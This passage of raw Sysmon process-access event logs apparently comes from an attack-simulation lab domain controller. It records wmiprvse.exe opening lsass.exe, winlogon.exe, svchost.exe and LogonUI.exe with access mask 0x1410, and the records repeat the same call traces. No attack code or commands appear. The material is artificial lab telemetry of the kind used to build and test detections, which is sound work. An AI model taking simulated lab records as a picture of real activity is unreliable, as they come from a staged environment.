C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5615,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nTargetProcessId: 996\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","TargetProcessId":"996","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5616,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010BCB40000}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5617,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5618,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: 